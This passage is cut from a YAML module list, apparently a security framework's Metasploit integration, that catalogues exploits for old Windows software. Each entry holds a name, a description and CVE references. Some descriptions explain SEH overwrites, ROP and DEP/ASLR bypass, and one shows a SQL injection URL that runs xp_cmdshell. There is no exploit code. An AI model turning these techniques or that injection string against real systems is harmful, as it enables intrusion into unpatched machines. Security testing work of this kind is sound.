\t\t\t\tfor scripting, so choose your attack vector accordingly.\n\
\t\t\t"
authors:
- - CVE
- 2008-4922
- - OSVDB
- "49592"
- - BID
- "31987"
path: extensions/metasploit/
class: Msf_module
msf_ht_mp3player_ht3_bof:
enable: true
msf: true
msf_key: windows/fileformat/ht_mp3player_ht3_bof
name: HT-MP3Player 1.0 HT3 File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in HT-MP3Player 1.0.\n\
\t\t\t\t\tArbitrary code execution could occur when parsing a specially crafted\n\
\t\t\t\t\t.HT3 file.\n\n\
\t\t\t\t\tNOTE: The player installation does not register the file type to be\n\
\t\t\t\t\thandled. Therefore, a user must take extra steps to load this file.\n\
\t\t\t"
authors:
- - CVE
- 2009-2485
- - OSVDB
- "55449"
- - URL
- http://www.milw0rm.com/exploits/9034
- - URL
- http://www.milw0rm.com/exploits/9038
path: extensions/metasploit/
class: Msf_module
msf_vlc_webm:
enable: true
msf: true
msf_key: windows/fileformat/vlc_webm
name: VideoLAN VLC MKV Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an input validation error in VideoLAN VLC\n\
\t\t\t\t< 1.1.7. By creating a malicious MKV or WebM file, a remote attacker\n\
\t\t\t\tcould execute arbitrary code.\n\n\
\t\t\t\tNOTE: As of July 1st, 2010, VLC now calls SetProcessDEPPoly to\n\
\t\t\t\tpermanently enable NX support on machines that support it.\n\
\t\t\t"
authors:
- - OSVDB
- "70698"
- - CVE
- 2011-0531
- - BID
- "46060"
- - URL
- http://git.videolan.org/?p=vlc.git&a=commitdiff&h=59491dcedffbf97612d2c572943b56ee4289dd07&hp=f085cfc1c95b922e3c750ee93ec58c3f2d5f7456
- - URL
- http://www.videolan.org/security/sa1102.html
path: extensions/metasploit/
class: Msf_module
msf_altap_salamander_pdb:
enable: true
msf: true
msf_key: windows/fileformat/altap_salamander_pdb
name: Altap Salamander 2.5 PE Viewer Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Altap Salamander <= v2.5.\n\
\t\t\t\t\tBy creating a malicious file and convincing a user to view the file with\n\
\t\t\t\t\tthe Portable Executable Viewer plugin within a vulnerable version of\n\
\t\t\t\t\tSalamander, the PDB file string is copied onto the stack and the\n\
\t\t\t\t\tSEH can be overwritten.\n\
\t\t\t"
authors:
- - CVE
- 2007-3314
- - BID
- "24557"
- - OSVDB
- "37579"
- - URL
- http://vuln.sg/salamander25-en.html
path: extensions/metasploit/
class: Msf_module
msf_adobe_illustrator_v14_eps:
enable: true
msf: true
msf_key: windows/fileformat/adobe_illustrator_v14_eps
name: Adobe Illustrator CS4 v14.0.0
category: Metasploit
description: "\n\
\t\t\t\t\tAdobe Illustrator CS4 (V14.0.0) Encapsulated Postscript (.eps)\n\
\t\t\t\toverlong DSC Comment Buffer Overflow Exploit\n\
\t\t\t"
authors:
- - CVE
- 2009-4195
- - BID
- "37192"
- - OSVDB
- "60632"
- - URL
- http://retrogod.altervista.org/9sg_adobe_illuso.html
- - URL
- http://www.exploit-db.com/exploits/10281
path: extensions/metasploit/
class: Msf_module
msf_ezip_wizard_bof:
enable: true
msf: true
msf_key: windows/fileformat/ezip_wizard_bof
name: eZip Wizard 3.0 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow vulnerability in\n\
\t\t\t\tversion 3.0 of ediSys Corp.'s eZip Wizard.\n\n\
\t\t\t\tIn order for the exploit to succeed, an attacker must convince someone to\n\
\t\t\t\topen a specially crafted zip file with eZip Wizard, and access the specially\n\
\t\t\t\tcrafted file by double-clicking it. By doing so, an attacker can execute arbitrary\n\
\t\t\t\tcode as the victim user.\n\
\t\t\t"
authors:
- - CVE
- 2009-1028
- - OSVDB
- "52815"
- - BID
- "34044"
- - URL
- http://www.edisys.com/
- - URL
- http://www.exploit-db.com/exploits/8180
- - URL
- http://www.exploit-db.com/exploits/12059/
path: extensions/metasploit/
class: Msf_module
msf_aol_phobos_bof:
enable: true
msf: true
msf_key: windows/fileformat/aol_phobos_bof
name: AOL 9.5 Phobos.Playlist Import() Stack-based Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\tThis module exploits a stack-based buffer overflow within Phobos.dll of AOL 9.5.\n\
\t\t\t\tBy setting an overly long value to 'Import()', an attacker can overrun a buffer\n\
\t\t\t\tand execute arbitrary code.\n\n\
\t\t\t\tNOTE: This ActiveX control is NOT marked safe for scripting or initialization.\n\
\t\t\t"
authors:
- - OSVDB
- "61964"
- - URL
- http://www.exploit-db.com/exploits/11204
- - URL
- http://www.rec-sec.com/2010/01/25/aol-playlist-class-buffer-overflow/
path: extensions/metasploit/
class: Msf_module
msf_videospirit_visprj:
enable: true
msf: true
msf_key: windows/fileformat/videospirit_visprj
name: VeryTools Video Spirit Pro <= 1.70
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Video Spirit <= 1.70.\n\
\t\t\t\tWhen opening a malicious project file (.visprj), a stack buffer overflow occurs,\n\
\t\t\t\tresulting in arbitrary code execution.\n\
\t\t\t\tThis exploit bypasses DEP & ASLR, and works on XP, Vista & Windows 7.\n\
\t\t\t"
authors:
- - CVE
- 2011-0499
- - CVE
- 2011-0500
- - OSVDB
- "70619"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-001
path: extensions/metasploit/
class: Msf_module
msf_destinymediaplayer16:
enable: true
msf: true
msf_key: windows/fileformat/destinymediaplayer16
name: Destiny Media Player 1.61 PLS M3U Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Destiny Media Player 1.61.\n\
\t\t\t\t\tAn attacker must send the file to the victim and the victim must open the file. File-->Open Playlist\n\
\t\t\t"
authors:
- - CVE
- 2009-3429
- - OSVDB
- "53249"
- - URL
- http://www.milw0rm.com/exploits/7651
- - BID
- "33091"
path: extensions/metasploit/
class: Msf_module
msf_xenorate_xpl_bof:
enable: true
msf: true
msf_key: windows/fileformat/xenorate_xpl_bof
name: Xenorate 2.50 (.xpl) universal Local Buffer Overflow Exploit (SEH)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Xenorate 2.50\n\
\t\t\t\tBy creating a specially crafted xpl file, an attacker may be able\n\
\t\t\t\tto execute arbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "57162"
- - URL
- http://www.exploit-db.com/exploits/10371
path: extensions/metasploit/
class: Msf_module
msf_ursoft_w32dasm:
enable: true
msf: true
msf_key: windows/fileformat/ursoft_w32dasm
name: URSoft W32Dasm Disassembler Function Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in W32Dasm <= v8.93.\n\
\t\t\t\tBy creating a malicious file and convincing a user to disassemble\n\
\t\t\t\tthe file with a vulnerable version of W32Dasm, the Imports/Exports\n\
\t\t\t\tfunction is copied to the stack and arbitrary code may be executed\n\
\t\t\t\tlocally as the user.\n\
\t\t\t"
authors:
- - CVE
- 2005-0308
- - OSVDB
- "13169"
- - BID
- "12352"
- - URL
- http://aluigi.altervista.org/adv/w32dasmbof-adv.txt
path: extensions/metasploit/
class: Msf_module
msf_ultraiso_ccd:
enable: true
msf: true
msf_key: windows/fileformat/ultraiso_ccd
name: UltraISO CCD File Parsing Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in EZB Systems, Inc's\n\
\t\t\t\tUltraISO. When processing .CCD files, data is read from file into a\n\
\t\t\t\tfixed-size stack buffer. Since no bounds checking is done, a buffer overflow\n\
\t\t\t\tcan occur. Attackers can execute arbitrary code by convincing their victim\n\
\t\t\t\tto open a CCD file.\n\n\
\t\t\t\tNOTE: A file with the same base name, but the extension of \"img\" must also\n\
\t\t\t\texist. Opening either file will trigger the vulnerability, but the files must\n\
\t\t\t\tboth exist.\n\
\t\t\t"
authors:
- - CVE
- 2009-1260
- - OSVDB
- "53275"
- - BID
- "34363"
- - BID
- "38613"
- - URL
- http://www.exploit-db.com/exploits/8343
path: extensions/metasploit/
class: Msf_module
msf_zinfaudioplayer221_pls:
enable: true
msf: true
msf_key: windows/fileformat/zinfaudioplayer221_pls
name: Zinf Audio Player 2.2.1 (PLS File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in the Zinf Audio Player 2.2.1.\n\
\t\t\t\tAn attacker must send the file to the victim and the victim must open the file.\n\
\t\t\t\tAlternatively it may be possible to execute code remotely via an embedded\n\
\t\t\t\tPLS file within a browser, when the PLS extension is registered to Zinf.\n\
\t\t\t\tThis functionality has not been tested in this module.\n\
\t\t\t"
authors:
- - CVE
- 2004-0964
- - OSVDB
- "10416"
- - URL
- http://www.milw0rm.com/exploits/7888
- - BID
- "11248"
path: extensions/metasploit/
class: Msf_module
msf_digital_music_pad_pls:
enable: true
msf: true
msf_key: windows/fileformat/digital_music_pad_pls
name: Digital Music Pad Version 8.2.3.3.4 Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Digital Music Pad Version 8.2.3.3.4\n\
\t\t\t\tWhen opening a malicious pls file with the Digital Music Pad,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code.\n\
\t\t\t"
authors:
- - OSVDB
- "68178"
- - URL
- http://secunia.com/advisories/41519/
- - URL
- http://www.exploit-db.com/exploits/15134
path: extensions/metasploit/
class: Msf_module
msf_adobe_u3d_meshdecl:
enable: true
msf: true
msf_key: windows/fileformat/adobe_u3d_meshdecl
name: Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits an array overflow in Adobe Reader and Adobe Acrobat.\n\
\t\t\t\t\tAffected versions include < 7.1.4, < 8.2, and < 9.3. By creating a\n\
\t\t\t\t\tspecially crafted pdf that contains malformed U3D data, an attacker may\n\
\t\t\t\t\tbe able to execute arbitrary code.\n\
\t\t\t"
authors:
- - CVE
- 2009-3953
- - OSVDB
- "61690"
- - URL
- http://www.adobe.com/support/security/bulletins/apsb10-02.html
path: extensions/metasploit/
class: Msf_module
msf_magix_musikmaker_16_mmm:
enable: true
msf: true
msf_key: windows/fileformat/magix_musikmaker_16_mmm
name: Magix Musik Maker 16 .mmm Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Magix Musik Maker 16.\n\
\t\t\t\tWhen opening a specially crafted arrangement file (.mmm) in the application, an\n\
\t\t\t\tunsafe strcpy() will allow you to overwrite a SEH handler. This exploit\n\
\t\t\t\tbypasses DEP & ASLR, and works on XP, Vista & Windows 7. Egghunter is used, and\n\
\t\t\t\tmight require up to several seconds to receive a shell.\n\
\t\t\t"
authors:
- - OSVDB
- "72455"
- - URL
- http://www.corelan.be/advisories.php?id=CORELAN-11-002
path: extensions/metasploit/
class: Msf_module
msf_adobe_pdf_embedded_exe_nojs:
enable: true
msf: true
msf_key: windows/fileformat/adobe_pdf_embedded_exe_nojs
name: Adobe PDF Escape EXE Social Engineering (No JavaScript)
category: Metasploit
description: "\n\
\t\t\t\t\tThis module embeds a Metasploit payload into an existing PDF file in\n\
\t\t\t\ta non-standard method. The resulting PDF can be sent to a target as\n\
\t\t\t\tpart of a social engineering attack.\n\
\t\t\t"
authors:
- - CVE
- 2010-1240
- - OSVDB
- "63667"
- - URL
- http://blog.didierstevens.com/2010/04/06/update-escape-from-pdf/
- - URL
- http://blog.didierstevens.com/2010/03/31/escape-from-foxit-reader/
- - URL
- http://blog.didierstevens.com/2010/03/29/escape-from-pdf/
path: extensions/metasploit/
class: Msf_module
msf_ms_visual_basic_vbp:
enable: true
msf: true
msf_key: windows/fileformat/ms_visual_basic_vbp
name: Microsoft Visual Basic VBP Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack overflow in Microsoft Visual\n\
\t\t\t\tBasic 6.0. When a specially crafted vbp file containing a long\n\
\t\t\t\treference line is opened, an attacker may be able to execute arbitrary\n\
\t\t\t\tcode.\n\
\t\t\t"
authors:
- - CVE
- 2007-4776
- - OSVDB
- "36936"
- - BID
- "25629"
path: extensions/metasploit/
class: Msf_module
msf_somplplayer_m3u:
enable: true
msf: true
msf_key: windows/fileformat/somplplayer_m3u
name: S.O.M.P.L 1.0 Player Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in Simple Open Music Player v1.0. When\n\
\t\t\t\tthe application is used to import a specially crafted m3u file, a buffer overflow occurs\n\
\t\t\t\tallowing arbitrary code execution.\n\
\t\t\t"
authors:
- - OSVDB
- "64368"
- - URL
- http://www.exploit-db.com/exploits/11219
path: extensions/metasploit/
class: Msf_module
msf_foxit_title_bof:
enable: true
msf: true
msf_key: windows/fileformat/foxit_title_bof
name: Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Foxit PDF Reader prior to version\n\
\t\t\t\t4.2.0.0928. The vulnerability is triggered when opening a malformed PDF file that\n\
\t\t\t\tcontains an overly long string in the Title field. This results in overwriting a\n\
\t\t\t\tstructured exception handler record.\n\n\
\t\t\t\tNOTE: This exploit does not use javascript.\n\
\t\t\t"
authors:
- - OSVDB
- "68648"
- - URL
- http://www.exploit-db.com/exploits/15532
- - URL
- http://www.corelan.be:8800/index.php/2010/11/13/offensive-security-exploit-weekend/
path: extensions/metasploit/
class: Msf_module
msf_varicad_dwb:
enable: true
msf: true
msf_key: windows/fileformat/varicad_dwb
name: VariCAD 2010-2.05 EN (DWB File) Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack-based buffer overflow in VariCAD 2010-2.05 EN.\n\
\t\t\t\tAn attacker must send the file to the victim and the victim must open the file.\n\
\t\t\t"
authors:
- - OSVDB
- "63067"
- - BID
- "38815"
- - URL
- http://www.exploit-db.com/exploits/11789
path: extensions/metasploit/
class: Msf_module
msf_ms09_004_sp_replwritetovarbin_sqli:
enable: true
msf: true
msf_key: windows/mssql/ms09_004_sp_replwritetovarbin_sqli
name: Microsoft SQL Server sp_replwritetovarbin Memory Corruption via SQL Injection
category: Metasploit
description: "\n\
\t\t\t\t\tA heap-based buffer overflow can occur when calling the undocumented\n\
\t\t\t\t\"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n\
\t\t\t\tall versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n\
\t\t\t\tand Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n\
\t\t\t\tMicrosoft patched this vulnerability in SP3 for 2005 without any public\n\
\t\t\t\tmention.\n\n\
\t\t\t\tThis exploit smashes several pointers, as shown below.\n\n\
\t\t\t\t1. pointer to a 32-bit value that is set to 0\n\
\t\t\t\t2. pointer to a 32-bit value that is set to a length influenced by the buffer\n\
\t\t\t\t\tlength.\n\
\t\t\t\t3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n\
\t\t\t\t\tthis value is referenced with a displacement of 0x38. For MSSQL 2005, the\n\
\t\t\t\t\tdisplacement is 0x10. The address of our buffer is conveniently stored in\n\
\t\t\t\t\tecx when this instruction is executed.\n\
\t\t\t\t4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n\
\t\t\t\t\ta displacement of 4. This pointer is not used by this exploit.\n\n\
\t\t\t\tThis particular exploit replaces the previous dual-method exploit. It uses\n\
\t\t\t\ta technique where the value contained in ecx becomes the stack. From there,\n\
\t\t\t\treturn oriented programming is used to normalize the execution state and\n\
\t\t\t\tfinally execute the payload via a \"jmp esp\". All addresses used were found\n\
\t\t\t\twithin the sqlservr.exe memory space, yielding very reliable code execution\n\
\t\t\t\tusing only a single query.\n\n\
\t\t\t\tNOTE: The MSSQL server service does not automatically restart by default. That\n\
\t\t\t\tsaid, some exceptions are caught and will not result in terminating the process.\n\
\t\t\t\tIf the exploit crashes the service prior to hijacking the stack, it won't die.\n\
\t\t\t\tOtherwise, it's a goner.\n\
\t\t\t"
authors:
- - OSVDB
- "50589"
- - CVE
- 2008-5416
- - BID
- "32710"
- - MSB
- MS09-004
- - URL
- http://www.milw0rm.com/exploits/7501
- - URL
- http://www.secforce.co.uk/blog/2011/01/exploiting-ms09-004-via-sql-injection/
path: extensions/metasploit/
class: Msf_module
msf_lyris_listmanager_weak_pass:
enable: true
msf: true
msf_key: windows/mssql/lyris_listmanager_weak_pass
name: Lyris ListManager MSDE Weak sa Password
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a weak password vulnerability in the\n\
\t\t\t\tLyris ListManager MSDE install. During installation, the 'sa'\n\
\t\t\t\taccount password is set to 'lminstall'. Once the install\n\
\t\t\t\tcompletes, it is set to 'lyris' followed by the process\n\
\t\t\t\tID of the installer. This module brute forces all possible\n\
\t\t\t\tprocess IDs that would be used by the installer.\n\
\t\t\t"
authors:
- - CVE
- 2005-4145
- - OSVDB
- "21559"
path: extensions/metasploit/
class: Msf_module
msf_ms02_056_hello:
enable: true
msf: true
msf_key: windows/mssql/ms02_056_hello
name: Microsoft SQL Server Hello Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tBy sending malformed data to TCP port 1433, an\n\
\t\t\t\tunauthenticated remote attacker could overflow a buffer and\n\
\t\t\t\tpossibly execute code on the server with SYSTEM level\n\
\t\t\t\tprivileges. This module should work against any vulnerable\n\
\t\t\t\tSQL Server 2000 or MSDE install (< SP3).\n\n\
\t\t\t"
authors:
- - CVE
- 2002-1123
- - OSVDB
- "10132"
- - BID
- "5411"
- - MSB
- MS02-056
path: extensions/metasploit/
class: Msf_module
msf_mssql_payload_sqli:
enable: true
msf: true
msf_key: windows/mssql/mssql_payload_sqli
name: Microsoft SQL Server Payload Execution via SQL injection
category: Metasploit
description: "\n\
\t\t\t\t\tThis module will execute an arbitrary payload on a Microsoft SQL\n\
\t\t\t\tServer, using a SQL injection vulnerability.\n\n\
\t\t\t\tOnce a vulnerability is identified this module\n\
\t\t\t\twill use xp_cmdshell to upload and execute Metasploit payloads.\n\
\t\t\t\tIt is necessary to specify the exact point where the SQL injection\n\
\t\t\t\tvulnerability happens. For example, given the following injection:\n\n\
\t\t\t\thttp://www.example.com/show.asp?id=1;exec xp_cmdshell 'dir';--&cat=electrical\n\n\
\t\t\t\tyou would need to set the following path:\n\
\t\t\t\tset GET_PATH /showproduct.asp?id=1;[SQLi];--&cat=foobar\n\n\
\t\t\t\tIn regard to the payload, unless there is a closed port in the web server,\n\
\t\t\t\tyou don't want to use any \"bind\" payload, especially on port 80, as you will\n\
\t\t\t\tstop reaching the vulnerable web server host. You want a \"reverse\" payload, probably to\n\
\t\t\t\tyour port 80 or to any other outbound port allowed on the firewall.\n\
\t\t\t\tFor privileged ports execute Metasploit msfconsole as root.\n\n\
\t\t\t\tCurrently, three delivery methods are supported.\n\n\
\t\t\t\tFirst, the original method uses Windows 'debug.com'. File size restrictions are\n\
\t\t\t\tavoided by incorporating the debug bypass method presented by SecureStat at\n\
\t\t\t\tDefcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.\n\n\
\t\t\t\tA second method takes advantage of the Command Stager subsystem. This allows using\n\
\t\t\t\tvarious techniques, such as using a TFTP server, to send the executable. By default\n\
\t\t\t\tthe Command Stager uses 'wscript.exe' to generate the executable on the target.\n\n\
\t\t\t\tFinally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n\
\t\t\t\tpayload on the target.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished.\n\n\
\t\t\t"
authors:
- - CVE
- 2000-0402
- - OSVDB
- "557"
- - BID
- "1281"
- - CVE
- 2000-1209
- - OSVDB
- "15757"
- - BID
- "4797"
- - URL
- http://www.secforce.co.uk/blog/2011/01/penetration-testing-sql-injection-and-metasploit/
path: extensions/metasploit/
class: Msf_module
msf_mssql_payload:
enable: true
msf: true
msf_key: windows/mssql/mssql_payload
name: Microsoft SQL Server Payload Execution
category: Metasploit
description: "\n\
\t\t\t\t\tThis module executes an arbitrary payload on a Microsoft SQL Server by using\n\
\t\t\t\tthe \"xp_cmdshell\" stored procedure. Currently, three delivery methods are supported.\n\n\
\t\t\t\tFirst, the original method uses Windows 'debug.com'. File size restrictions are\n\
\t\t\t\tavoided by incorporating the debug bypass method presented by SecureStat at\n\
\t\t\t\tDefcon 17. Since this method invokes ntvdm, it is not available on x86_64 systems.\n\n\
\t\t\t\tA second method takes advantage of the Command Stager subsystem. This allows using\n\
\t\t\t\tvarious techniques, such as using a TFTP server, to send the executable. By default\n\
\t\t\t\tthe Command Stager uses 'wscript.exe' to generate the executable on the target.\n\n\
\t\t\t\tFinally, ReL1K's latest method utilizes PowerShell to transmit and recreate the\n\
\t\t\t\tpayload on the target.\n\n\
\t\t\t\tNOTE: This module will leave a payload executable on the target system when the\n\
\t\t\t\tattack is finished.\n\
\t\t\t"
authors:
- - CVE
- 2000-0402
- - OSVDB
- "557"
- - BID
- "1281"
- - CVE
- 2000-1209
- - OSVDB
- "15757"
- - BID
- "4797"
path: extensions/metasploit/
class: Msf_module
msf_ms02_039_slammer:
enable: true
msf: true
msf_key: windows/mssql/ms02_039_slammer
name: Microsoft SQL Server Resolution Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis is an exploit for the SQL Server 2000 resolution\n\
\t\t\t\tservice buffer overflow. This overflow is triggered by\n\
\t\t\t\tsending a udp packet to port 1434 which starts with 0x04 and\n\
\t\t\t\tis followed by long string terminating with a colon and a\n\
\t\t\t\tnumber. This module should work against any vulnerable SQL\n\
\t\t\t\tServer 2000 or MSDE install (pre-SP3).\n\n\
\t\t\t"
authors:
- - CVE
- 2002-0649
- - OSVDB
- "4578"
- - BID
- "5310"
- - MSB
- MS02-039
path: extensions/metasploit/
class: Msf_module
msf_ms09_004_sp_replwritetovarbin:
enable: true
msf: true
msf_key: windows/mssql/ms09_004_sp_replwritetovarbin
name: Microsoft SQL Server sp_replwritetovarbin Memory Corruption
category: Metasploit
description: "\n\
\t\t\t\t\tA heap-based buffer overflow can occur when calling the undocumented\n\
\t\t\t\t\"sp_replwritetovarbin\" extended stored procedure. This vulnerability affects\n\
\t\t\t\tall versions of Microsoft SQL Server 2000 and 2005, Windows Internal Database,\n\
\t\t\t\tand Microsoft Desktop Engine (MSDE) without the updates supplied in MS09-004.\n\
\t\t\t\tMicrosoft patched this vulnerability in SP3 for 2005 without any public\n\
\t\t\t\tmention.\n\n\
\t\t\t\tAn authenticated database session is required to access the vulnerable code.\n\
\t\t\t\tThat said, it is possible to access the vulnerable code via an SQL injection\n\
\t\t\t\tvulnerability.\n\n\
\t\t\t\tThis exploit smashes several pointers, as shown below.\n\n\
\t\t\t\t1. pointer to a 32-bit value that is set to 0\n\
\t\t\t\t2. pointer to a 32-bit value that is set to a length influenced by the buffer\n\
\t\t\t\t\tlength.\n\
\t\t\t\t3. pointer to a 32-bit value that is used as a vtable pointer. In MSSQL 2000,\n\
\t\t\t\t\tthis value is referenced with a displacement of 0x38. For MSSQL 2005, the\n\
\t\t\t\t\tdisplacement is 0x10. The address of our buffer is conveniently stored in\n\
\t\t\t\t\tecx when this instruction is executed.\n\
\t\t\t\t4. On MSSQL 2005, an additional vtable ptr is smashed, which is referenced with\n\
\t\t\t\t\ta displacement of 4. This pointer is not used by this exploit.\n\n\
\t\t\t\tThis particular exploit replaces the previous dual-method exploit. It uses\n\
\t\t\t\ta technique where the value contained in ecx becomes the stack. From there,\n\
\t\t\t\treturn oriented programming is used to normalize the execution state and\n\
\t\t\t\tfinally execute the payload via a \"jmp esp\". All addresses used were found\n\
\t\t\t\twithin the sqlservr.exe memory space, yielding very reliable code execution\n\
\t\t\t\tusing only a single query.\n\n\
\t\t\t\tNOTE: The MSSQL server service does not automatically restart by default. That\n\
\t\t\t\tsaid, some exceptions are caught and will not result in terminating the process.\n\
\t\t\t\tIf the exploit crashes the service prior to hijacking the stack, it won't die.\n\
\t\t\t\tOtherwise, it's a goner.\n\
\t\t\t"
authors:
- - OSVDB
- "50589"
- - CVE
- 2008-5416
- - BID
- "32710"
- - MSB
- MS09-004
- - URL
- http://www.milw0rm.com/exploits/7501
path: extensions/metasploit/
class: Msf_module
msf_ms04_011_pct:
enable: true
msf: true
msf_key: windows/ssl/ms04_011_pct
name: Microsoft Private Communications Transport Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in the Microsoft\n\
\t\t\t\tWindows SSL PCT protocol stack. This code is based on Johnny\n\
\t\t\t\tCyberpunk's THC release and has been tested against Windows\n\
\t\t\t\t2000 and Windows XP. To use this module, specify the remote\n\
\t\t\t\tport of any SSL service, or the port and protocol of an\n\
\t\t\t\tapplication that uses SSL. The only application protocol\n\
\t\t\t\tsupported at this time is SMTP. You only have one chance to\n\
\t\t\t\tselect the correct target, if you are attacking IIS, you may\n\
\t\t\t\twant to try one of the other exploits first (WebDAV). If\n\
\t\t\t\tWebDAV does not work, this more than likely means that this\n\
\t\t\t\tis either Windows 2000 SP4+ or Windows XP (IIS 5.0 vs IIS\n\
\t\t\t\t5.1). Using the wrong target may not result in an immediate\n\
\t\t\t\tcrash of the remote system.\n\
\t\t\t"
authors:
- - CVE
- 2003-0719
- - OSVDB
- "5250"
- - BID
- "10116"
- - MSB
- MS04-011
path: extensions/metasploit/
class: Msf_module
msf_domino_http_accept_language:
enable: true
msf: true
msf_key: windows/lotus/domino_http_accept_language
name: IBM Lotus Domino Web Server Accept-Language Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in IBM Lotus Domino Web Server\n\
\t\t\t\tprior to version 7.0.3FP1 and 8.0.1. This flaw is triggered by any HTTP\n\
\t\t\t\trequest with an Accept-Language header greater than 114 bytes.\n\
\t\t\t"
authors:
- - CVE
- 2008-2240
- - OSVDB
- "45415"
- - BID
- "29310"
- - URL
- http://www-01.ibm.com/support/docview.wss?uid=swg21303057
path: extensions/metasploit/
class: Msf_module
msf_domino_sametime_stmux:
enable: true
msf: true
msf_key: windows/lotus/domino_sametime_stmux
name: IBM Lotus Domino Sametime STMux.exe Stack Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a stack buffer overflow in Lotus Domino's Sametime\n\
\t\t\t\tServer. By sending an overly long POST request to the Multiplexer\n\
\t\t\t\tSTMux.exe service we are able to overwrite SEH. Based on the exploit\n\
\t\t\t\tby Manuel Santamarina Suarez.\n\
\t\t\t"
authors:
- - CVE
- 2008-2499
- - OSVDB
- "45610"
- - BID
- "29328"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-08-028/
path: extensions/metasploit/
class: Msf_module
msf_domino_icalendar_organizer:
enable: true
msf: true
msf_key: windows/lotus/domino_icalendar_organizer
name: IBM Lotus Domino iCalendar MAILTO Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a vulnerability found in IBM Lotus Domino iCalendar. By\n\
\t\t\t\tsending a long string of data as the \"ORGANIZER;mailto\" header, process \"nRouter.exe\"\n\
\t\t\t\tcrashes due to a Cstrcpy() routine in nnotes.dll, which allows remote attackers to\n\
\t\t\t\tgain arbitrary code execution.\n\n\
\t\t\t\tNote: In order to trigger the vulnerable code path, a valid Domino mailbox account\n\
\t\t\t\tis needed.\n\
\t\t\t"
authors:
- - CVE
- 2010-3407
- - OSVDB
- "68040"
- - URL
- http://www.zerodayinitiative.com/advisories/ZDI-10-177/
- - URL
- http://labs.mwrinfosecurity.com/advisories/lotus_domino_ical_stack_buffer_overflow/
- - URL
- http://www-01.ibm.com/support/docview.wss?rs=475&uid=swg21446515
path: extensions/metasploit/
class: Msf_module
msf_sipxezphone_cseq:
enable: true
msf: true
msf_key: windows/sip/sipxezphone_cseq
name: SIPfoundry sipXezPhone 0.35a CSeq Field Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\n\
\t\t\t\tsipXezPhone version 0.35a. By sending a long CSeq header,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system with the privileges of\n\
\t\t\t\tthe affected application.\n\
\t\t\t"
authors:
- - CVE
- 2006-3524
- - OSVDB
- "27122"
- - BID
- "18906"
path: extensions/metasploit/
class: Msf_module
msf_aim_triton_cseq:
enable: true
msf: true
msf_key: windows/sip/aim_triton_cseq
name: AIM Triton 1.0.4 CSeq Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in AOL's AIM\n\
\t\t\t\tTriton 1.0.4. By sending an overly long CSeq value,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system with the privileges of\n\
\t\t\t\tthe affected application.\n\
\t\t\t"
authors:
- - CVE
- 2006-3524
- - OSVDB
- "27122"
- - BID
- "18906"
path: extensions/metasploit/
class: Msf_module
msf_sipxphone_cseq:
enable: true
msf: true
msf_key: windows/sip/sipxphone_cseq
name: SIPfoundry sipXphone 2.6.0.27 CSeq Buffer Overflow
category: Metasploit
description: "\n\
\t\t\t\t\tThis module exploits a buffer overflow in SIPfoundry's\n\
\t\t\t\tsipXphone 2.6.0.27. By sending an overly long CSeq value,\n\
\t\t\t\ta remote attacker could overflow a buffer and execute\n\
\t\t\t\tarbitrary code on the system with the privileges of\n\
\t\t\t\tthe affected application.\n\
\t\t\t"
authors:
- - CVE
- 2006-3524
- - OSVDB
- "27122"
- - BID
- "18906"
path: extensions/metasploit/
class: Msf_module
msf_ms10_025_wmss_connect_funnel:
enable: true
msf: true
